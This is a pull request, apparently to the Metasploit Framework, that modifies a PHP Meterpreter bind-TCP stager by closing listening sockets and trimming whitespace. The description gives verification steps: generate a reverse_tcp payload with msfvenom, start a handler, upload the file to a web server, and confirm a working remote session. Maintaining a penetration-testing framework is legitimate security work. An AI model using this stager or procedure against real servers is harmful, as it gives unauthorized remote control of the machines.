### PR TITLE
Strip the NULL that PHP no longer strips

### DIFF
--- a/data/php/bind_tcp.php
+++ b/data/php/bind_tcp.php
@@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
 	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
 	if (!$srvsock) { die(); }
 	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
 	$s_type = 'stream';
 } elseif (is_callable('socket_create_listen')) {
 	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } elseif (is_callable('socket_create')) {
 	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
 	$res = socket_bind($srvsock, $ipaddr, $port);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } else {
 	die();
 }
 if (!$s) { die(); }
 
-switch ($s_type) { 
+switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -40,7 +43,7 @@ $len = $a['len'];
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}


### PR DESCRIPTION
As of PHP 5.5.0, unpack("a", ...) no longer strips the NULL byte from
the end of the string. A new format specifier, Z, was introduced to
perform the old behavior, but we don't have a good way to test for its
existence. Instead, just remove it with str_replace.

Verification:
- [x] find php version 5.5.0 or newer somewhere.  This is default on at least Ubuntu 14.04
  - [x] build a payload `msfvenom -p php/meterpreter/reverse_tcp LPORT=... LHOST=... -f raw > rm8823.php`
  - [x] set up a handler for the above values
  - [x] upload `rm8823.php` to that server and request it
  - [x] VERIFY: session created
  - [x] VERIFY: session is usable.  `pwd`, `getuid`, `sysinfo`
- [x] repeat the above for php version < 5.5.0
